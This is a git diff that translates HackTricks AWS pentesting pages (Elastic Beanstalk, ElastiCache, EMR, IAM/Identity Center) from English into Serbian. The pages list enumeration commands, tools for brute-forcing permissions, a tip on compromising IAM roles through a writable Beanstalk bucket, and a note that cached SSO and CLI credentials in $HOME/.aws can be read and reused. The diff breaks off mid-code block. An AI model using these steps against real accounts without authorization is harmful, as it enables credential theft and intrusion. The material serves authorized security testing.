+Elastic Beanstalk pruža jednostavan i fleksibilan način za **implementaciju vaših aplikacija u AWS cloud**, bez potrebe da brinete o osnovnoj infrastrukturi. Ona **automatski** upravlja detaljima kapaciteta **provisioning**, opterećenja **balansiranja**, **skaliranja** i zdravlja aplikacije **monitoring**, omogućavajući vam da se fokusirate na pisanje i implementaciju vašeg koda.
 
-The infrastructure created by Elastic Beanstalk is managed by **Autoscaling** Groups in **EC2** (with a load balancer). Which means that at the end of the day, if you **compromise the host**, you should know about about EC2:
+Infrastruktura koju kreira Elastic Beanstalk upravlja **Autoscaling** grupama u **EC2** (sa load balancer-om). Što znači da na kraju dana, ako **kompromitujete host**, trebate znati o EC2:
 
 {{#ref}}
 aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/
 {{#endref}}
 
-Moreover, if Docker is used, it’s possible to use **ECS**.
+Pored toga, ako se koristi Docker, moguće je koristiti **ECS**.
 
 {{#ref}}
 aws-eks-enum.md
 {{#endref}}
 
-### Application & Environments
+### Aplikacija i Okruženja
 
-In AWS Elastic Beanstalk, the concepts of an "application" and an "environment" serve different purposes and have distinct roles in the deployment process.
+U AWS Elastic Beanstalk, koncepti "aplikacije" i "okruženja" služe različitim svrhama i imaju različite uloge u procesu implementacije.
 
-#### Application
+#### Aplikacija
 
-- An application in Elastic Beanstalk is a **logical container for your application's source code, environments, and configurations**. It groups together different versions of your application code and allows you to manage them as a single entity.
-- When you create an application, you provide a name and **description, but no resources are provisioned** at this stage. it is simply a way to organize and manage your code and related resources.
-- You can have **multiple application versions** within an application. Each version corresponds to a specific release of your code, which can be deployed to one or more environments.
+- Aplikacija u Elastic Beanstalk je **logički kontejner za izvorni kod vaše aplikacije, okruženja i konfiguracije**. Grupira različite verzije vašeg aplikacionog koda i omogućava vam da njima upravljate kao jednom celinom.
+- Kada kreirate aplikaciju, pružate ime i **opis, ali u ovoj fazi se ne provisioniraju resursi**. To je jednostavno način da organizujete i upravljate svojim kodom i povezanim resursima.
+- Možete imati **više verzija aplikacije** unutar jedne aplikacije. Svaka verzija odgovara specifičnom izdanju vašeg koda, koje može biti implementirano u jedno ili više okruženja.
 
-#### Environment
+#### Okruženje
 
-- An environment is a **provisioned instance of your application** running on AWS infrastructure. It is **where your application code is deployed and executed**. Elastic Beanstalk provisions the necessary resources (e.g., EC2 instances, load balancers, auto-scaling groups, databases) based on the environment configuration.
-- **Each environment runs a single version of your application**, and you can have multiple environments for different purposes, such as development, testing, staging, and production.
-- When you create an environment, you choose a platform (e.g., Java, .NET, Node.js, etc.) and an environment type (e.g., web server or worker). You can also customize the environment configuration to control various aspects of the infrastructure and application settings.
+- Okruženje je **provisionirana instanca vaše aplikacije** koja radi na AWS infrastrukturi. To je **gde se vaš aplikacioni kod implementira i izvršava**. Elastic Beanstalk provisionira potrebne resurse (npr. EC2 instance, load balancere, auto-scaling grupe, baze podataka) na osnovu konfiguracije okruženja.
+- **Svako okruženje pokreće jednu verziju vaše aplikacije**, i možete imati više okruženja za različite svrhe, kao što su razvoj, testiranje, staging i produkcija.
+- Kada kreirate okruženje, birate platformu (npr. Java, .NET, Node.js, itd.) i tip okruženja (npr. web server ili worker). Takođe možete prilagoditi konfiguraciju okruženja kako biste kontrolisali različite aspekte infrastrukture i postavki aplikacije.
 
-### 2 types of Environments
+### 2 tipa Okruženja
 
-1. **Web Server Environment**: It is designed to **host and serve web applications and APIs**. These applications typically handle incoming HTTP/HTTPS requests. The web server environment provisions resources such as **EC2 instances, load balancers, and auto-scaling** groups to handle incoming traffic, manage capacity, and ensure the application's high availability.
-2. **Worker Environment**: It is designed to process **background tasks**, which are often time-consuming or resource-intensive operations that don't require immediate responses to clients. The worker environment provisions resources like **EC2 instances and auto-scaling groups**, but it **doesn't have a load balancer** since it doesn't handle HTTP/HTTPS requests directly. Instead, it consumes tasks from an **Amazon Simple Queue Service (SQS) queue**, which acts as a buffer between the worker environment and the tasks it processes.
+1. **Web Server Okruženje**: Dizajnirano je da **hostuje i servira web aplikacije i API-je**. Ove aplikacije obično obrađuju dolazne HTTP/HTTPS zahteve. Web server okruženje provisionira resurse kao što su **EC2 instance, load balanceri i auto-scaling** grupe za upravljanje dolaznim saobraćajem, upravljanje kapacitetom i osiguranje visoke dostupnosti aplikacije.
+2. **Worker Okruženje**: Dizajnirano je za obradu **pozadinskih zadataka**, koji su često dugotrajne ili resursno intenzivne operacije koje ne zahtevaju trenutne odgovore klijentima. Worker okruženje provisionira resurse poput **EC2 instanci i auto-scaling grupa**, ali **nema load balancer** jer ne obrađuje HTTP/HTTPS zahteve direktno. Umesto toga, konzumira zadatke iz **Amazon Simple Queue Service (SQS) reda**, koji deluje kao međuspremnik između worker okruženja i zadataka koje obrađuje.
 
-### Security
+### Bezbednost
 
-When creating an App in Beanstalk there are 3 very important security options to choose:
+Kada kreirate aplikaciju u Beanstalk-u, postoje 3 veoma važna bezbednosna opcija za izbor:
 
-- **EC2 key pair**: This will be the **SSH key** that will be able to access the EC2 instances running the app
-- **IAM instance profile**: This is the **instance profile** that the instances will have (**IAM privileges**)
-  - The autogenerated role is called **`aws-elasticbeanstalk-ec2-role`** and has some interesting access over all ECS, all SQS, DynamoDB elasticbeanstalk and elasticbeanstalk S3 using the AWS managed policies: [AWSElasticBeanstalkWebTier](https://us-east-1.console.aws.amazon.com/iam/home#/policies/arn:aws:iam::aws:policy/AWSElasticBeanstalkWebTier), [AWSElasticBeanstalkMulticontainerDocker](https://us-east-1.console.aws.amazon.com/iam/home#/policies/arn:aws:iam::aws:policy/AWSElasticBeanstalkMulticontainerDocker), [AWSElasticBeanstalkWorkerTier](https://us-east-1.console.aws.amazon.com/iam/home#/policies/arn:aws:iam::aws:policy/AWSElasticBeanstalkWorkerTier).
-- **Service role**: This is the **role that the AWS service** will use to perform all the needed actions. Afaik, a regular AWS user cannot access that role.
-  - This role generated by AWS is called **`aws-elasticbeanstalk-service-role`** and uses the AWS managed policies [AWSElasticBeanstalkEnhancedHealth](https://us-east-1.console.aws.amazon.com/iam/home#/policies/arn:aws:iam::aws:policy/service-role/AWSElasticBeanstalkEnhancedHealth) and [AWSElasticBeanstalkManagedUpdatesCustomerRolePolicy](https://us-east-1.console.aws.amazon.com/iamv2/home?region=us-east-1#/roles/details/aws-elasticbeanstalk-service-role?section=permissions)
+- **EC2 ključni par**: Ovo će biti **SSH ključ** koji će moći da pristupi EC2 instancama koje pokreću aplikaciju.
+- **IAM instanca profil**: Ovo je **profil instance** koji će instance imati (**IAM privilegije**).
+- Autogenerisana uloga se zove **`aws-elasticbeanstalk-ec2-role`** i ima zanimljiv pristup svim ECS, svim SQS, DynamoDB elasticbeanstalk i elasticbeanstalk S3 koristeći AWS upravljane politike: [AWSElasticBeanstalkWebTier](https://us-east-1.console.aws.amazon.com/iam/home#/policies/arn:aws:iam::aws:policy/AWSElasticBeanstalkWebTier), [AWSElasticBeanstalkMulticontainerDocker](https://us-east-1.console.aws.amazon.com/iam/home#/policies/arn:aws:iam::aws:policy/AWSElasticBeanstalkMulticontainerDocker), [AWSElasticBeanstalkWorkerTier](https://us-east-1.console.aws.amazon.com/iam/home#/policies/arn:aws:iam::aws:policy/AWSElasticBeanstalkWorkerTier).
+- **Uloga servisa**: Ovo je **uloga koju će AWS servis** koristiti za izvršavanje svih potrebnih akcija. Koliko znam, običan AWS korisnik ne može pristupiti toj ulozi.
+- Ova uloga generisana od strane AWS-a se zove **`aws-elasticbeanstalk-service-role`** i koristi AWS upravljane politike [AWSElasticBeanstalkEnhancedHealth](https://us-east-1.console.aws.amazon.com/iam/home#/policies/arn:aws:iam::aws:policy/service-role/AWSElasticBeanstalkEnhancedHealth) i [AWSElasticBeanstalkManagedUpdatesCustomerRolePolicy](https://us-east-1.console.aws.amazon.com/iamv2/home?region=us-east-1#/roles/details/aws-elasticbeanstalk-service-role?section=permissions)
 
-By default **metadata version 1 is disabled**:
+Podrazumevano je **metadata verzija 1 onemogućena**:
 
 

 
-### Exposure
+### Izloženost
 
-Beanstalk data is stored in a **S3 bucket** with the following name: **`elasticbeanstalk--`**(if it was created in the AWS console). Inside this bucket you will find the uploaded **source code of the application**.
+Podaci Beanstalk-a se čuvaju u **S3 bucket-u** sa sledećim imenom: **`elasticbeanstalk--`**(ako je kreiran u AWS konzoli). Unutar ovog bucket-a naći ćete **izvorni kod aplikacije**.
 
-The **URL** of the created webpage is **`http://-env...elasticbeanstalk.com/`**
+**URL** kreirane web stranice je **`http://-env...elasticbeanstalk.com/`**
 
 > [!WARNING]
-> If you get **read access** over the bucket, you can **read the source code** and even find **sensitive credentials** on it
+> Ako dobijete **pristup za čitanje** nad bucket-om, možete **pročitati izvorni kod** i čak pronaći **osetljive akreditive** u njemu.
 >
-> if you get **write access** over the bucket, you could **modify the source code** to **compromise** the **IAM role** the application is using next time it's executed.
-
-### Enumeration
+> Ako dobijete **pristup za pisanje** nad bucket-om, mogli biste **modifikovati izvorni kod** da **kompromitujete** **IAM ulogu** koju aplikacija koristi sledeći put kada se izvrši.
 
+### Enumeracija
 ```bash
 # Find S3 bucket
 ACCOUNT_NUMBER=
@@ -85,33 +84,28 @@ aws elasticbeanstalk describe-instances-health --environment-name  # G
 # Get events
 aws elasticbeanstalk describe-events
 ```
-
-### Unauthenticated Access
+### Neautentifikovani Pristup
 
 {{#ref}}
 ../aws-unauthenticated-enum-access/aws-elastic-beanstalk-unauthenticated-enum.md
 {{#endref}}
 
-### Persistence
+### Perzistencija
 
 {{#ref}}
 ../aws-persistence/aws-elastic-beanstalk-persistence.md
 {{#endref}}
 
-### Privesc
+### Povišenje Privilegija
 
 {{#ref}}
 ../aws-privilege-escalation/aws-elastic-beanstalk-privesc.md
 {{#endref}}
 
-### Post Exploitation
+### Post Eksploatacija
 
 {{#ref}}
 ../aws-post-exploitation/aws-elastic-beanstalk-post-exploitation.md
 {{#endref}}
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-elasticache.md b/src/pentesting-cloud/aws-security/aws-services/aws-elasticache.md
index 6305fcc91..3d547df49 100644
--- a/src/pentesting-cloud/aws-security/aws-services/aws-elasticache.md
+++ b/src/pentesting-cloud/aws-security/aws-services/aws-elasticache.md
@@ -4,10 +4,9 @@
 
 ## ElastiCache
 
-AWS ElastiCache is a fully **managed in-memory data store and cache service** that provides high-performance, low-latency, and scalable solutions for applications. It supports two popular open-source in-memory engines: **Redis and Memcached**. ElastiCache **simplifies** the **setup**, **management**, and **maintenance** of these engines, allowing developers to offload time-consuming tasks such as provisioning, patching, monitoring, and **backups**.
+AWS ElastiCache je potpuno **upravljana usluga skladištenja podataka u memoriji i keširanja** koja pruža visoke performanse, nisku latenciju i skalabilna rešenja za aplikacije. Podržava dva popularna open-source motora u memoriji: **Redis i Memcached**. ElastiCache **pojednostavljuje** **postavljanje**, **upravljanje** i **održavanje** ovih motora, omogućavajući programerima da preuzmu vremenski zahtevne zadatke kao što su obezbeđivanje, zakrčivanje, praćenje i **rezervne kopije**.
 
 ### Enumeration
-
 ```bash
 # ElastiCache clusters
 ## Check the SecurityGroups to later check who can access
@@ -39,11 +38,6 @@ aws elasticache describe-users
 # List ElastiCache events
 aws elasticache describe-events
 ```
-
 ### Privesc (TODO)
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-emr-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-emr-enum.md
index b05012f3e..7f45cd901 100644
--- a/src/pentesting-cloud/aws-security/aws-services/aws-emr-enum.md
+++ b/src/pentesting-cloud/aws-security/aws-services/aws-emr-enum.md
@@ -4,38 +4,37 @@
 
 ## EMR
 
-AWS's Elastic MapReduce (EMR) service, starting from version 4.8.0, introduced a **security configuration** feature that enhances data protection by allowing users to specify encryption settings for data at rest and in transit within EMR clusters, which are scalable groups of EC2 instances designed to process big data frameworks like Apache Hadoop and Spark.
+AWS-ova Elastic MapReduce (EMR) usluga, počevši od verzije 4.8.0, uvela je **konfiguraciju bezbednosti** koja poboljšava zaštitu podataka omogućavajući korisnicima da odrede podešavanja enkripcije za podatke u mirovanju i u tranzitu unutar EMR klastera, koji su skalabilne grupe EC2 instanci dizajnirane za obradu velikih podataka kao što su Apache Hadoop i Spark.
 
-Key characteristics include:
+Ključne karakteristike uključuju:
 
-- **Cluster Encryption Default**: By default, data at rest within a cluster is not encrypted. However, enabling encryption provides access to several features:
-  - **Linux Unified Key Setup**: Encrypts EBS cluster volumes. Users can opt for AWS Key Management Service (KMS) or a custom key provider.
-  - **Open-Source HDFS Encryption**: Offers two encryption options for Hadoop:
-    - Secure Hadoop RPC (Remote Procedure Call), set to privacy, leveraging the Simple Authentication Security Layer.
-    - HDFS Block transfer encryption, set to true, utilizes the AES-256 algorithm.
-- **Encryption in Transit**: Focuses on securing data during transfer. Options include:
-  - **Open Source Transport Layer Security (TLS)**: Encryption can be enabled by choosing a certificate provider:
-    - **PEM**: Requires manual creation and bundling of PEM certificates into a zip file, referenced from an S3 bucket.
-    - **Custom**: Involves adding a custom Java class as a certificate provider that supplies encryption artifacts.
+- **Podrazumevana enkripcija klastera**: Po defaultu, podaci u mirovanju unutar klastera nisu enkriptovani. Međutim, omogućavanje enkripcije pruža pristup nekoliko funkcija:
+- **Linux Unified Key Setup**: Enkriptuje EBS klaster volumene. Korisnici mogu izabrati AWS Key Management Service (KMS) ili prilagođenog provajdera ključeva.
+- **Open-Source HDFS Enkripcija**: Nudi dve opcije enkripcije za Hadoop:
+- Siguran Hadoop RPC (Remote Procedure Call), postavljen na privatnost, koristeći Simple Authentication Security Layer.
+- HDFS Block transfer enkripcija, postavljena na true, koristi AES-256 algoritam.
+- **Enkripcija u tranzitu**: Fokusira se na zaštitu podataka tokom prenosa. Opcije uključuju:
+- **Open Source Transport Layer Security (TLS)**: Enkripcija se može omogućiti izborom provajdera sertifikata:
+- **PEM**: Zahteva ručno kreiranje i pakovanje PEM sertifikata u zip fajl, referenciran iz S3 bucket-a.
+- **Prilagođeno**: Uključuje dodavanje prilagođene Java klase kao provajdera sertifikata koji obezbeđuje enkripcijske artefakte.
 
-Once a TLS certificate provider is integrated into the security configuration, the following application-specific encryption features can be activated, varying based on the EMR version:
+Kada se provajder TLS sertifikata integriše u konfiguraciju bezbednosti, sledeće funkcije enkripcije specifične za aplikaciju mogu biti aktivirane, u zavisnosti od verzije EMR:
 
 - **Hadoop**:
-  - Might reduce encrypted shuffle using TLS.
-  - Secure Hadoop RPC with Simple Authentication Security Layer and HDFS Block Transfer with AES-256 are activated with at-rest encryption.
-- **Presto** (EMR version 5.6.0+):
-  - Internal communication between Presto nodes is secured using SSL and TLS.
+- Može smanjiti enkriptovani shuffle koristeći TLS.
+- Siguran Hadoop RPC sa Simple Authentication Security Layer i HDFS Block Transfer sa AES-256 su aktivirani sa enkripcijom u mirovanju.
+- **Presto** (EMR verzija 5.6.0+):
+- Interna komunikacija između Presto čvorova je zaštićena koristeći SSL i TLS.
 - **Tez Shuffle Handler**:
-  - Utilizes TLS for encryption.
+- Koristi TLS za enkripciju.
 - **Spark**:
-  - Employs TLS for the Akka protocol.
-  - Uses Simple Authentication Security Layer and 3DES for Block Transfer Service.
-  - External shuffle service is secured with the Simple Authentication Security Layer.
+- Koristi TLS za Akka protokol.
+- Koristi Simple Authentication Security Layer i 3DES za Block Transfer Service.
+- Spoljašnja shuffle usluga je zaštićena sa Simple Authentication Security Layer.
 
-These features collectively enhance the security posture of EMR clusters, especially concerning data protection during storage and transmission phases.
+Ove funkcije zajedno poboljšavaju bezbednosni položaj EMR klastera, posebno u vezi sa zaštitom podataka tokom faza skladištenja i prenosa.
 
 #### Enumeration
-
 ```bash
 aws emr list-clusters
 aws emr describe-cluster --cluster-id 
@@ -46,19 +45,14 @@ aws emr list-notebook-executions
 aws emr list-security-configurations
 aws emr list-studios #Get studio URLs
 ```
-
 #### Privesc
 
 {{#ref}}
 ../aws-privilege-escalation/aws-emr-privesc.md
 {{#endref}}
 
-## References
+## Reference
 
 - [https://cloudacademy.com/course/domain-three-designing-secure-applications-and-architectures/elastic-mapreduce-emr-encryption-1/](https://cloudacademy.com/course/domain-three-designing-secure-applications-and-architectures/elastic-mapreduce-emr-encryption-1/)
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-iam-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-iam-enum.md
index 7a430cc17..42e868433 100644
--- a/src/pentesting-cloud/aws-security/aws-services/aws-iam-enum.md
+++ b/src/pentesting-cloud/aws-security/aws-services/aws-iam-enum.md
@@ -4,7 +4,7 @@
 
 ## IAM
 
-You can find a **description of IAM** in:
+Možete pronaći **opis IAM-a** u:
 
 {{#ref}}
 ../aws-basic-information/
@@ -12,9 +12,9 @@ You can find a **description of IAM** in:
 
 ### Enumeration
 
-Main permissions needed:
+Glavne dozvole potrebne:
 
-- `iam:ListPolicies`, `iam:GetPolicy` and `iam:GetPolicyVersion`
+- `iam:ListPolicies`, `iam:GetPolicy` i `iam:GetPolicyVersion`
 - `iam:ListRoles`
 - `iam:ListUsers`
 - `iam:ListGroups`
@@ -22,10 +22,9 @@ Main permissions needed:
 - `iam:ListAttachedUserPolicies`
 - `iam:ListAttachedRolePolicies`
 - `iam:ListAttachedGroupPolicies`
-- `iam:ListUserPolicies` and `iam:GetUserPolicy`
-- `iam:ListGroupPolicies` and `iam:GetGroupPolicy`
-- `iam:ListRolePolicies` and `iam:GetRolePolicy`
-
+- `iam:ListUserPolicies` i `iam:GetUserPolicy`
+- `iam:ListGroupPolicies` i `iam:GetGroupPolicy`
+- `iam:ListRolePolicies` i `iam:GetRolePolicy`
 ```bash
 # All IAMs
 ## Retrieves  information about all IAM users, groups, roles, and policies
@@ -89,64 +88,54 @@ aws iam get-account-password-policy
 aws iam list-mfa-devices
 aws iam list-virtual-mfa-devices
 ```
-
 ### Permissions Brute Force
 
-If you are interested in your own permissions but you don't have access to query IAM you could always brute-force them.
+Ako ste zainteresovani za svoje dozvole, ali nemate pristup za upit IAM, uvek možete da ih brute-force.
 
 #### bf-aws-permissions
 
-The tool [**bf-aws-permissions**](https://github.com/carlospolop/bf-aws-permissions) is just a bash script that will run using the indicated profile all the **`list*`, `describe*`, `get*`** actions it can find using `aws` cli help messages and **return the successful executions**.
-
+Alat [**bf-aws-permissions**](https://github.com/carlospolop/bf-aws-permissions) je samo bash skripta koja će se pokrenuti koristeći navedeni profil za sve **`list*`, `describe*`, `get*`** akcije koje može pronaći koristeći `aws` cli pomoćne poruke i **vratiće uspešne izvršenja**.
 ```bash
 # Bruteforce permissions
 bash bf-aws-permissions.sh -p default > /tmp/bf-permissions-verbose.txt
 ```
-
 #### bf-aws-perms-simulate
 
-The tool [**bf-aws-perms-simulate**](https://github.com/carlospolop/bf-aws-perms-simulate) can find your current permission (or the ones of other principals) if you have the permission **`iam:SimulatePrincipalPolicy`**
-
+Alat [**bf-aws-perms-simulate**](https://github.com/carlospolop/bf-aws-perms-simulate) može pronaći vaše trenutne dozvole (ili dozvole drugih principala) ako imate dozvolu **`iam:SimulatePrincipalPolicy`**
 ```bash
 # Ask for permissions
 python3 aws_permissions_checker.py --profile  [--arn ]
 ```
-
 #### Perms2ManagedPolicies
 
-If you found **some permissions your user has**, and you think that they are being granted by a **managed AWS role** (and not by a custom one). You can use the tool [**aws-Perms2ManagedRoles**](https://github.com/carlospolop/aws-Perms2ManagedPolicies) to check all the **AWS managed roles that grants the permissions you discovered that you have**.
-
+Ako ste pronašli **neke dozvole koje vaš korisnik ima**, i mislite da su dodeljene od strane **upravljane AWS uloge** (a ne od prilagođene). Možete koristiti alat [**aws-Perms2ManagedRoles**](https://github.com/carlospolop/aws-Perms2ManagedPolicies) da proverite sve **AWS upravljane uloge koje dodeljuju dozvole koje ste otkrili da imate**.
 ```bash
 # Run example with my profile
 python3 aws-Perms2ManagedPolicies.py --profile myadmin --permissions-file example-permissions.txt
 ```
-
 > [!WARNING]
-> It's possible to "know" if the permissions you have are granted by an AWS managed role if you see that **you have permissions over services that aren't used** for example.
+> Moguće je "znati" da li su dozvole koje imate dodeljene od strane AWS upravljane uloge ako vidite da **imate dozvole za usluge koje se ne koriste** na primer.
 
 #### Cloudtrail2IAM
 
-[**CloudTrail2IAM**](https://github.com/carlospolop/Cloudtrail2IAM) is a Python tool that analyses **AWS CloudTrail logs to extract and summarize actions** done by everyone or just an specific user or role. The tool will **parse every cloudtrail log from the indicated bucket**.
-
+[**CloudTrail2IAM**](https://github.com/carlospolop/Cloudtrail2IAM) je Python alat koji analizira **AWS CloudTrail logove kako bi izvukao i sažeo akcije** koje su izvršili svi ili samo određeni korisnik ili uloga. Alat će **parsirati svaki cloudtrail log iz naznačenog bucket-a**.
 ```bash
 git clone https://github.com/carlospolop/Cloudtrail2IAM
 cd Cloudtrail2IAM
 pip install -r requirements.txt
 python3 cloudtrail2IAM.py --prefix PREFIX --bucket_name BUCKET_NAME --profile PROFILE [--filter-name FILTER_NAME] [--threads THREADS]
 ```
-
 > [!WARNING]
-> If you find .tfstate (Terraform state files) or CloudFormation files (these are usually yaml files located inside a bucket with the prefix cf-templates), you can also read them to find aws configuration and find which permissions have been assigned to who.
+> Ako pronađete .tfstate (Terraform state files) ili CloudFormation datoteke (to su obično yaml datoteke smeštene unutar bucket-a sa prefiksom cf-templates), možete ih takođe pročitati da pronađete aws konfiguraciju i saznate koje su dozvole dodeljene kome.
 
 #### enumerate-iam
 
-To use the tool [**https://github.com/andresriancho/enumerate-iam**](https://github.com/andresriancho/enumerate-iam) you first need to download all the API AWS endpoints, from those the script **`generate_bruteforce_tests.py`** will get all the **"list\_", "describe\_", and "get\_" endpoints.** And finally, it will try to **access them** with the given credentials and **indicate if it worked**.
+Da biste koristili alat [**https://github.com/andresriancho/enumerate-iam**](https://github.com/andresriancho/enumerate-iam), prvo treba da preuzmete sve API AWS krajnje tačke, od kojih će skripta **`generate_bruteforce_tests.py`** dobiti sve **"list\_", "describe\_", i "get\_" krajnje tačke.** I na kraju, pokušaće da **pristupi njima** sa datim akreditivima i **naznači da li je uspelo**.
 
-(In my experience the **tool hangs at some point**, [**checkout this fix**](https://github.com/andresriancho/enumerate-iam/pull/15/commits/77ad5b41216e3b5f1511d0c385da8cd5984c2d3c) to try to fix that).
+(U mom iskustvu, **alat se u nekom trenutku zamrzne**, [**pogledajte ovo rešenje**](https://github.com/andresriancho/enumerate-iam/pull/15/commits/77ad5b41216e3b5f1511d0c385da8cd5984c2d3c) da biste pokušali da to popravite).
 
 > [!WARNING]
-> In my experience this tool is like the previous one but working worse and checking less permissions
-
+> U mom iskustvu, ovaj alat je kao prethodni, ali radi lošije i proverava manje dozvola.
 ```bash
 # Install tool
 git clone git@github.com:andresriancho/enumerate-iam.git
@@ -163,11 +152,9 @@ cd ..
 # Enumerate permissions
 python3 enumerate-iam.py --access-key ACCESS_KEY --secret-key SECRET_KEY [--session-token SESSION_TOKEN] [--region REGION]
 ```
-
 #### weirdAAL
 
-You could also use the tool [**weirdAAL**](https://github.com/carnal0wnage/weirdAAL/wiki). This tool will check **several common operations on several common services** (will check some enumeration permissions and also some privesc permissions). But it will only check the coded checks (the only way to check more stuff if coding more tests).
-
+Možete takođe koristiti alat [**weirdAAL**](https://github.com/carnal0wnage/weirdAAL/wiki). Ovaj alat će proveriti **nekoliko uobičajenih operacija na nekoliko uobičajenih usluga** (proveriće neka prava za enumeraciju i takođe neka prava za privesc). Ali će proveriti samo kodirane provere (jedini način da se proveri više stvari je kodiranje više testova).
 ```bash
 # Install
 git clone https://github.com/carnal0wnage/weirdAAL.git
@@ -191,12 +178,10 @@ python3 weirdAAL.py -m recon_all -t MyTarget # Check all permissions
 # [+] elbv2 Actions allowed are [+]
 # ['DescribeLoadBalancers', 'DescribeAccountLimits', 'DescribeTargetGroups']
 ```
-
-#### Hardening Tools to BF permissions
+#### Alati za učvršćivanje BF dozvola
 
 {{#tabs }}
 {{#tab name="CloudSploit" }}
-
 ```bash
 # Export env variables
 ./index.js --console=text --config ./config.js --json /tmp/out-cloudsploit.json
@@ -207,11 +192,9 @@ jq 'map(select(.status | contains("UNKNOWN") | not))' /tmp/out-cloudsploit.json
 # Get services by regions
 jq 'group_by(.region) | map({(.[0].region): ([map((.resource | split(":"))[2]) | unique])})' ~/Desktop/pentests/cere/greybox/core-dev-dev-cloudsploit-filtered.json
 ```
-
 {{#endtab }}
 
 {{#tab name="SteamPipe" }}
-
 ```bash
 # https://github.com/turbot/steampipe-mod-aws-insights
 steampipe check all --export=json
@@ -220,50 +203,48 @@ steampipe check all --export=json
 # In this case you cannot output to JSON, so heck it in the dashboard
 steampipe dashboard
 ```
-
 {{#endtab }}
 {{#endtabs }}
 
 #### \
 
-Neither of the previous tools is capable of checking close to all permissions, so if you know a better tool send a PR!
+Ni jedan od prethodnih alata nije sposoban da proveri skoro sve dozvole, pa ako znate bolji alat pošaljite PR!
 
-### Unauthenticated Access
+### Neautentifikovani Pristup
 
 {{#ref}}
 ../aws-unauthenticated-enum-access/aws-iam-and-sts-unauthenticated-enum.md
 {{#endref}}
 
-### Privilege Escalation
+### Eskalacija Privilegija
 
-In the following page you can check how to **abuse IAM permissions to escalate privileges**:
+Na sledećoj stranici možete proveriti kako da **zloupotrebite IAM dozvole za eskalaciju privilegija**:
 
 {{#ref}}
 ../aws-privilege-escalation/aws-iam-privesc.md
 {{#endref}}
 
-### IAM Post Exploitation
+### IAM Post Eksploatacija
 
 {{#ref}}
 ../aws-post-exploitation/aws-iam-post-exploitation.md
 {{#endref}}
 
-### IAM Persistence
+### IAM Perzistencija
 
 {{#ref}}
 ../aws-persistence/aws-iam-persistence.md
 {{#endref}}
 
-## IAM Identity Center
+## IAM Identitet Centar
 
-You can find a **description of IAM Identity Center** in:
+Možete pronaći **opis IAM Identitet Centra** u:
 
 {{#ref}}
 ../aws-basic-information/
 {{#endref}}
 
-### Connect via SSO with CLI
-
+### Povezivanje putem SSO sa CLI
 ```bash
 # Connect with sso via CLI aws configure sso
 aws configure sso
@@ -274,20 +255,18 @@ sso_account_id = 
 sso_role_name = AdministratorAccess
 sso_region = us-east-1
 ```
-
 ### Enumeration
 
-The main elements of the Identity Center are:
+Glavni elementi Identity Centra su:
 
-- Users and groups
-- Permission Sets: Have policies attached
-- AWS Accounts
+- Korisnici i grupe
+- Skupovi dozvola: Imaju pridružene politike
+- AWS računi
 
-Then, relationships are created so users/groups have Permission Sets over AWS Account.
+Zatim se kreiraju odnosi tako da korisnici/grupe imaju skupove dozvola nad AWS računom.
 
 > [!NOTE]
-> Note that there are 3 ways to attach policies to a Permission Set. Attaching AWS managed policies, Customer managed policies (these policies needs to be created in all the accounts the Permissions Set is affecting), and inline policies (defined in there).
-
+> Imajte na umu da postoje 3 načina za pridruživanje politika skupu dozvola. Pridruživanje AWS upravljanim politikama, politikama koje upravlja korisnik (ove politike treba da budu kreirane u svim računima na koje utiče skup dozvola), i inline politikama (definisanim tamo).
 ```bash
 # Check if IAM Identity Center is used
 aws sso-admin list-instances
@@ -321,11 +300,9 @@ aws identitystore list-group-memberships --identity-store-id  --group-
 ## Get memberships or a user or a group
 aws identitystore list-group-memberships-for-member --identity-store-id  --member-id 
 ```
-
 ### Local Enumeration
 
-It's possible to create inside the folder `$HOME/.aws` the file config to configure profiles that are accessible via SSO, for example:
-
+Moguće je kreirati unutar fascikle `$HOME/.aws` datoteku config za konfiguraciju profila koji su dostupni putem SSO, na primer:
 ```ini
 [default]
 region = us-west-2
@@ -343,20 +320,16 @@ output = json
 role_arn = arn:aws:iam:::role/ReadOnlyRole
 source_profile = Hacktricks-Admin
 ```
-
-This configuration can be used with the commands:
-
+Ova konfiguracija se može koristiti sa komandama:
 ```bash
 # Login in ms-sso-profile
 aws sso login --profile my-sso-profile
 # Use dependent-profile
 aws s3 ls --profile dependent-profile
 ```
+Kada se **profil iz SSO koristi** za pristup nekim informacijama, kredencijali se **keširaju** u datoteci unutar fascikle **`$HOME/.aws/sso/cache`**. Stoga se mogu **čitati i koristiti odatle**.
 
-When a **profile from SSO is used** to access some information, the credentials are **cached** in a file inside the folder **`$HOME/.aws/sso/cache`**. Therefore they can be **read and used from there**.
-
-Moreover, **more credentials** can be stored in the folder **`$HOME/.aws/cli/cache`**. This cache directory is primarily used when you are **working with AWS CLI profiles** that use IAM user credentials or **assume** roles through IAM (without SSO). Config example:
-
+Pored toga, **dodatni kredencijali** mogu biti pohranjeni u fascikli **`$HOME/.aws/cli/cache`**. Ova keš direktorija se prvenstveno koristi kada radite sa **AWS CLI profilima** koji koriste IAM korisničke kredencijale ili **pretpostavljaju** uloge putem IAM (bez SSO). Primer konfiguracije:
 ```ini
 [profile crossaccountrole]
 role_arn = arn:aws:iam::234567890123:role/SomeRole
@@ -364,43 +337,36 @@ source_profile = default
 mfa_serial = arn:aws:iam::123456789012:mfa/saanvi
 external_id = 123456
 ```
-
-### Unauthenticated Access
+### Neautentifikovani Pristup
 
 {{#ref}}
 ../aws-unauthenticated-enum-access/aws-identity-center-and-sso-unauthenticated-enum.md
 {{#endref}}
 
-### Privilege Escalation
+### Eskalacija Privilegija
 
 {{#ref}}
 ../aws-privilege-escalation/aws-sso-and-identitystore-privesc.md
 {{#endref}}
 
-### Post Exploitation
+### Post Eksploatacija
 
 {{#ref}}
 ../aws-post-exploitation/aws-sso-and-identitystore-post-exploitation.md
 {{#endref}}
 
-### Persistence
-
-#### Create a user an assign permissions to it
+### Postojanost
 
+#### Kreirajte korisnika i dodelite mu dozvole
 ```bash
 # Create user identitystore:CreateUser
